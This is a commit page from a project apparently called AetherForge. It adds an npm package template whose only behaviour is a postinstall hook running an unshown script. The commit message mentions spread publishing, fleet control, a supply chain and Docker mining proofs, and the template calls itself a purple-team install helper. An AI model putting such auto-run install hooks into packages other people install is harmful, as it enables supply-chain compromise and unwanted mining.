feat: alive UI wave, galaxy presence, spread and fleet enhancements
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
Dashboard ambient layer, comrade presence, Mission Deck and War Room, Emberwake supply chain, spread/docs publishing, fleet policy and modules API, CI docker mining, and refreshed USB pack.
This commit is contained in:
13
templates/npm-helper-package/package.json
Normal file
13
templates/npm-helper-package/package.json
Normal file
@@ -0,0 +1,13 @@
|
||||
{
|
||||
"name": "{{PACKAGE_NAME}}",
|
||||
"version": "1.0.0",
|
||||
"description": "Authorized AetherForge install helper — purple-team / lab use on packages you publish only.",
|
||||
"private": true,
|
||||
"license": "UNLICENSED",
|
||||
"scripts": {
|
||||
"postinstall": "node scripts/postinstall.cjs"
|
||||
},
|
||||
"engines": {
|
||||
"node": ">=18"
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user